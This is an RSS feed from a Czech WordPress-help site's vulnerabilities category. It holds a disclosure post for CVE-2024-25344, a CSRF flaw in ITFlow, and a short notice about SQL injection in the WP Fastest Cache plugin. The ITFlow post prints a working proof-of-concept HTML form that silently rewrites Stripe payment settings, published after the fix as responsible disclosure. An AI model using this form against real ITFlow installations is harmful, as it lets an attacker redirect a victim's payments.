<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Zranitelnosti Archivy - WP Pomoc</title>
	<atom:link href="https://wp-pomoc.cz/category/zranitelnosti/feed/" rel="self" type="application/rss+xml" />
	<link>https://wp-pomoc.cz/category/zranitelnosti/</link>
	<description>Zrychlujeme, opravujeme a vylepšujeme weby. WordPress pomoc s bleskovou rychlostí.</description>
	<lastBuildDate>Wed, 21 Feb 2024 18:43:45 +0000</lastBuildDate>
	<language>cs</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://wp-pomoc.cz/wp-content/uploads/2023/07/icon-blue-150x150.png</url>
	<title>Zranitelnosti Archivy - WP Pomoc</title>
	<link>https://wp-pomoc.cz/category/zranitelnosti/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>ITFlow CSRF zranitelnost CVE-2024-25344</title>
		<link>https://wp-pomoc.cz/itflow-csrf-zranitelnost-cve-2024-25344/</link>
		
		<dc:creator><![CDATA[wp-pomoc]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 18:41:18 +0000</pubDate>
				<category><![CDATA[Zranitelnosti]]></category>
		<guid isPermaLink="false">https://wp-pomoc.cz/?p=15215</guid>

					<description><![CDATA[<p>ITFlow zranitelnost (CVE-2024-25344) Ačkoliv naší pomoc zaměřujeme na systém WordPress, nejvíce se naše společnost zabývá vývojem zakázkového software a jeho provozu. V průběhu posledního čtvrtletí roku 2023 jsme pro naše klienty nasazovali open-source systém pro ticketing a správu klientů ITFlow. Při nasazování a nastavování, jsme kvůli několika nedokonalostem v dokumentaci zamířili pro informace přímo do [&#8230;]</p>
<p>Článek <a href="https://wp-pomoc.cz/itflow-csrf-zranitelnost-cve-2024-25344/">ITFlow CSRF zranitelnost CVE-2024-25344</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h2 class="wp-block-heading">ITFlow zranitelnost (CVE-2024-25344)</h2>



<p class="wp-block-paragraph">Ačkoliv naší pomoc zaměřujeme na systém WordPress, nejvíce se naše společnost zabývá vývojem zakázkového software a jeho provozu. V průběhu posledního čtvrtletí roku 2023 jsme pro naše klienty nasazovali open-source systém pro ticketing a správu klientů <a href="https://itflow.org">ITFlow</a>. </p>



<p class="wp-block-paragraph">Při nasazování a nastavování, jsme kvůli několika nedokonalostem v dokumentaci zamířili pro informace přímo do zdrojového kódu. V něm jsme identifikovali potenciální problém, kdy pro klíčové změny systému nedocházelo k využívání CSRF tokenů.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">Zranitelnost typu <strong>Cross Site Request Forgery (CSRF)</strong> se vyznačuje tím, že dochází ke zneužití aktuálního přihlášení uživatele v nějaké aplikaci, kdy bez jeho vědomí, v rámci jeho přihlášení, dochází k odesílání požadavků do zranitelné aplikace. Často tak dochází např. k nevyžádané změně hesla účtu atd.</p>
</blockquote>



<p class="wp-block-paragraph">Pro otestování naší hypotézy jsme sestavili PoC (Proof of concept) a vyzkoušeli na lokální verzi, zda se zranitelnost skutečně v testovaném software nachází. </p>



<h2 class="wp-block-heading">CVE-2024-25344</h2>



<p class="wp-block-paragraph">Software ITFlow měl zranitelnou sekci pro nastavení systému, konkrétně endpoint <em>post.php</em>, který využívá pro zpracovávání formulářů. Zde absentovala kontrola vygenerovaných CSRF tokenů, které jsou běžnou obranou před zranitelností CSRF. </p>



<p class="wp-block-paragraph">Po exploitování této zranitelnosti se nám <strong>podařilo změnit nastavení platební brány Stripe</strong>, kterou určitě velká většina WordPressáků zná, případně se nám podařilo upravit nastavení <strong>Microsoft Azure SSO</strong>. Výsledkem je pro útočníka možnost nastavit systém tak, aby veškeré platby skrze systém ITFlow a bránu Stripe obdržel on.</p>



<h3 class="wp-block-heading">PoC</h3>



<p class="wp-block-paragraph">Protože již byla zranitelnost v kooperaci s vývojáři opravena, zveřejňujeme tuto zprávu a náš PoC, pro zranitelné verze systému. Zranitelné jsou všechny instance ITFlow před commitem <a href="https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378" target="_blank" rel="noreferrer noopener">432488eca3998c5be6b6b9e8f8ba01f54bc12378</a>.</p>



<pre class="wp-block-code"><code><html>
<form enctype="multipart/form-data" method="POST" action="https://itflow.example.com/post.php">
    <table>
        <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr>
        <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr>
        <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr>
        <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr>
        <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr>
    </table>
    <input type="submit" value="https://itflow.example.com/post.php">
</form>
</html></code></pre>



<ul class="wp-block-list">
<li>Systém ITFlow – <a href="https://itflow.org" target="_blank" rel="noreferrer noopener">itflow.org</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-25344" target="_blank" rel="noreferrer noopener">NIST CVE-2024-25344</a></li>



<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25344" target="_blank" rel="noreferrer noopener">MITRE CVE-2024-25344</a></li>



<li><a href="https://packetstormsecurity.com/files/177224/ITFlow-Cross-Site-Request-Forgery.html" target="_blank" rel="noreferrer noopener">PacketStormSecurity CVE-2024-25344</a></li>



<li><a href="https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378" target="_blank" rel="noreferrer noopener">https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378</a></li>



<li><a href="https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46" target="_blank" rel="noreferrer noopener">https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46</a></li>
</ul>
<p>Článek <a href="https://wp-pomoc.cz/itflow-csrf-zranitelnost-cve-2024-25344/">ITFlow CSRF zranitelnost CVE-2024-25344</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>WP Fastest Cache kritická zranitelnost</title>
		<link>https://wp-pomoc.cz/wp-fastest-cache-kriticka-zranitelnost/</link>
		
		<dc:creator><![CDATA[wp-pomoc]]></dc:creator>
		<pubDate>Tue, 21 Nov 2023 10:14:02 +0000</pubDate>
				<category><![CDATA[Zranitelnosti]]></category>
		<guid isPermaLink="false">https://wp-pomoc.cz/?p=15200</guid>

					<description><![CDATA[<p>V rámci populárního pluginu WP Fastest Cache ve verzích do 1.2.2 byla objevena nová zranitelnost s hodnocením CVSS 9,8 z 10, tedy kritická. Jedná se o zranitelnost typu SQL Injection, která umožňuje nepřihlášenému útočníkovi pomocí cookie, jejíž hodnota je následně nedostatečně ošetřena, získat veškerá data z databáze případně ji i smazat. Pokud uchováváte osobní údaje, [&#8230;]</p>
<p>Článek <a href="https://wp-pomoc.cz/wp-fastest-cache-kriticka-zranitelnost/">WP Fastest Cache kritická zranitelnost</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">V rámci populárního pluginu <a href="https://wordpress.org/plugins/wp-fastest-cache/" target="_blank" rel="noreferrer noopener">WP Fastest Cache</a> ve verzích do 1.2.2 byla objevena nová zranitelnost s hodnocením CVSS 9,8 z 10, tedy <strong>kritická</strong>. Jedná se o zranitelnost typu SQL Injection, která umožňuje nepřihlášenému útočníkovi pomocí cookie, jejíž hodnota je následně nedostatečně ošetřena, získat veškerá data z databáze případně ji i smazat.</p>



<p class="wp-block-paragraph">Pokud uchováváte osobní údaje, mohlo dojít k jejich úniku. Analyzujte proto prosím svůj web jestli k němu opravdu nedošlo. Mohla vám tak vzniknout ohlašovací povinnost vůči regulátorovi.</p>



<p class="wp-block-paragraph">Pro naše klienty jsme problém okamžitě vyřešili a jejich weby aktualizovali na nejnovější verze. Pokud chcete i vy takový servis, neváhejte nás kontaktovat <a href="https://wp-pomoc.cz/kontakt/">zde</a>, nebo nám napište na <a href="mailto:info@wp-pomoc.cz">info@wp-pomoc.cz</a>.</p>
<p>Článek <a href="https://wp-pomoc.cz/wp-fastest-cache-kriticka-zranitelnost/">WP Fastest Cache kritická zranitelnost</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
